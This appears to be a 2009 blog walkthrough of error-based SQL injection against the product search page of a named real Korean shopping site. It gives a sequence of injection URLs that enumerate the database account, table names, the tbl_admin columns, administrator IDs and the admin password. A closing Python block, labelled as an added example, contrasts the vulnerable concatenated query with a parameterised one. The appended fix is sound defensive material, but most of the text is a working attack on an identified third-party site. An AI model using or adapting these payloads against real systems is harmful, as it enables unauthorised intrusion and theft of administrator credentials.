Search-type injection: a simple search-type injection
Published: Saturday, September 12, 2009
Simple
Then search again

Here I can see there is what was said above

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'=' // gets the current database account

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' // returns

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' // gets the current database

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' // gets the current database

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpo

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpo

In fact, analysis shows that only this tbl_admin table is the most important

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' // gets, in the tbl_admin table

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' // gets, in the tbl_admin table

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' // gets, in the tbl_admin table

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' // gets, in the tbl_admin table

The column names have all been dumped

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' // gets the

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' // gets the 2nd administrator

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' // gets the 3rd administrator

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' // gets the 4th administrator

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' // gets the 5th administrator

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' // this statement dumps the administrator password
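
Every request above has the shape `Donic%' ... and '%'='`, which only parses as SQL if the search term is concatenated inside a `LIKE '%...%'` literal. The following is an added example, not code from the original post or the site: it contrasts that concatenation with a bound, wildcard-escaped parameter. SQLite stands in for the SQL Server backend, and the `product` table, its rows and all function names are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the SQL Server backend.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product (name TEXT);
        INSERT INTO product VALUES
            ('Donic Bat'), ('Donic 100% Rubber'), ('Other Ball');
        CREATE TABLE tbl_admin (c_employee_id TEXT);
        INSERT INTO tbl_admin VALUES ('constructed-admin');
    """)
    return db

def search_vulnerable(db, term):
    # The term is concatenated inside LIKE '%...%': a quote in the term closes
    # the string literal and the rest of the input is parsed as SQL.
    sql = "SELECT name FROM product WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(term, esc="\\"):
    # Neutralise LIKE wildcards so the user's term only matches literally.
    for ch in (esc, "%", "_"):
        term = term.replace(ch, esc + ch)
    return term

def search_safe(db, term):
    # Bound parameter: the term is data only, never part of the SQL text.
    sql = "SELECT name FROM product WHERE name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(term) + "%"
    return [row[0] for row in db.execute(sql, (pattern,))]

# Probe with the shape used on the page: it closes the pattern, adds a
# subquery, then re-opens a literal so the trailing %' still parses.
PROBE = "Donic%' and (select count(*) from tbl_admin)>0 and '%'='"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PROBE))  # subquery is executed
    print("safe:      ", search_safe(db, PROBE))        # treated as literal text
    print("safe 100%: ", search_safe(db, "100%"))       # wildcard matched literally
```

With the concatenated query the subquery runs and product rows come back, which is the true/false signal the page's requests rely on; with the bound parameter the same input is just a search string that matches nothing.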